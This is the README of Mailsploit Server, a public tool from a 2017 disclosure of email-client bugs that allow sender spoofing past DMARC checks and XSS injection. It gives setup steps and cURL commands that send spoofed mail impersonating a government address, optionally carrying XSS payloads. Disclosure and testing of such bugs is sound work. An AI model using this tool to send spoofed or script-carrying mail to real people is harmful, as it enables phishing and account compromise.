(Released in December 2017) Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTAs), i.e. email servers, and therefore circumvents spoofing protection mechanisms such as DMARC (DKIM/SPF) and spam filters.
Latest commit 30d0b70 Jun 17, 2018

Mailsploit Server

Note: You will need an Amazon SES account with a verified domain in order to use the tool. Also, the web server can only run at 88 miles per hour.

How to install

  1. Clone the repository
  2. Set originalFrom in src/main/Config.ts to your verified SES email address.
  3. Run the following commands in the terminal:
     yarn install && yarn dist # Requires yarn

How to launch the web server

  1. Run the following command in the terminal:
     SES_USERNAME=[Amazon SES Username] SES_PASSWORD=[Amazon SES Password] node dist/commonjs/index.js
  2. That's it. The server will run on localhost:8081

How to use it

Send a POST request to the /process endpoint with the sender, receiver and options (from 0 to 13) parameters.

Example using cURL (payload 3 without XSS):

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&options=2"

or, all the payloads with XSS:

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&xss=true&options=-1"

All the payloads are available here.